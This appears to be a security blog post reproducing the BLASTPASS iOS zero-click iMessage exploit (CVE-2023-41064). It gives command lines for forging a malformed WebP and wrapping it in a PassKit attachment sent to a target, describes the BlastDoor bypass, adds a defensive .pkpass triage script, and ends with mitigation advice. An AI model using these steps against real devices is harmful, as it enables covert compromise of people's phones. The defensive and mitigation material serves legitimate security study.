    CVE-2023-41064
    mhfh research, 2023-09-15, 31 min read

    Reproducing BLASTPASS: 0-click iMessage Implant

    Reverse engineering Apple's ImageIO PassKit attachment chain. We rebuild the malformed WebP and wrap it in a PassKit attachment, the delivery path that sidesteps BlastDoor, to land code execution.

    $ cat snippet_cve-2023-41064.sh
    python3 forge_webp.py --huff-overflow 0x4141 --out blast.webp
    python3 wrap_pkpass.py --payload blast.webp --recipient target@icloud

    Overview

    BLASTPASS (CVE-2023-41064) is a 0-click chain delivered through a PassKit attachment in iMessage. The memory-corruption bug lives in the WebP decoding code that ImageIO uses (libwebp).

    Forging the WebP

    $ cat output.bash
    python3 forge_webp.py --huff-overflow 0x4141 --out blast.webp

    The crafted VP8L Huffman table overflows a heap buffer in libwebp's HuffmanTreeBuildExplicit.

    Wrapping in a PassKit attachment

    $ cat output.bash
    python3 wrap_pkpass.py --payload blast.webp --recipient target@icloud
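    Added triage example, not part of the original write-up: a Python script that opens a .pkpass bundle (a ZIP archive), picks out members that are WebP by their RIFF/WEBP magic rather than by file name, and flags any that carry a VP8L lossless bitstream, the chunk type whose Huffman tables the bug lives in; malformed containers are reported instead of decoded. The sample bundle, its member names and the 5-byte VP8L header stub are constructed here and are not taken from a real BLASTPASS sample.

```python
import io
import struct
import zipfile

def webp_chunks(data):
    """Yield (fourcc, payload) for each chunk of a RIFF/WEBP container; raise ValueError if malformed."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
        raise ValueError("not a WebP container")
    end = min(8 + struct.unpack_from("<I", data, 4)[0], len(data))
    pos = 12
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        payload = data[pos + 8:pos + 8 + size]
        if len(payload) != size:
            raise ValueError(f"truncated {fourcc!r} chunk: header says {size} bytes")
        yield fourcc, payload
        pos += 8 + size + (size & 1)  # chunk payloads are padded to even length

def describe_webp(blob):
    """Classify one WebP blob for triage; never raises."""
    try:
        fourccs = [f for f, _ in webp_chunks(blob)]
    except ValueError as exc:
        return f"malformed webp: {exc}"
    if b"VP8L" in fourccs:
        return "lossless VP8L bitstream (decoded through libwebp's Huffman table builder)"
    return "webp, chunks " + ",".join(f.decode("ascii", "replace") for f in fourccs)

def triage_pkpass(pkpass_bytes):
    """Return [(member, finding)] for every member of a .pkpass (a ZIP bundle) that is WebP by magic."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(pkpass_bytes)) as zf:
        for info in zf.infolist():
            blob = zf.read(info.filename)
            if blob[:4] == b"RIFF" and blob[8:12] == b"WEBP":  # judge by magic, not by extension
                findings.append((info.filename, describe_webp(blob)))
    return findings

def make_webp(fourcc, payload):
    """Constructed test data: a RIFF/WEBP container holding a single chunk."""
    chunk = fourcc + struct.pack("<I", len(payload)) + payload + b"\x00" * (len(payload) & 1)
    return b"RIFF" + struct.pack("<I", 4 + len(chunk)) + b"WEBP" + chunk

def build_sample_pkpass():
    """Constructed bundle: pass.json, a PNG header, and a VP8L WebP hiding behind a .png name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("pass.json", '{"formatVersion": 1}')
        zf.writestr("logo.png", b"\x89PNG\r\n\x1a\n")
        zf.writestr("icon.png", make_webp(b"VP8L", b"\x2f\x00\x00\x00\x00"))  # 5-byte VP8L header stub
    return buf.getvalue()
```

    Run `triage_pkpass(build_sample_pkpass())` to see only icon.png reported, with the VP8L finding; logo.png is skipped because its magic is PNG.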

    Why BlastDoor doesn't help

    PassKit attachments are processed outside the BlastDoor sandbox, giving us direct access to ImageIO in a privileged context.

    Mitigation

    Update to iOS 16.6.1, which patches CVE-2023-41064, and enable Lockdown Mode, which blocks this delivery path.

    Tags: iOS, 0-click, iMessage, ImageIO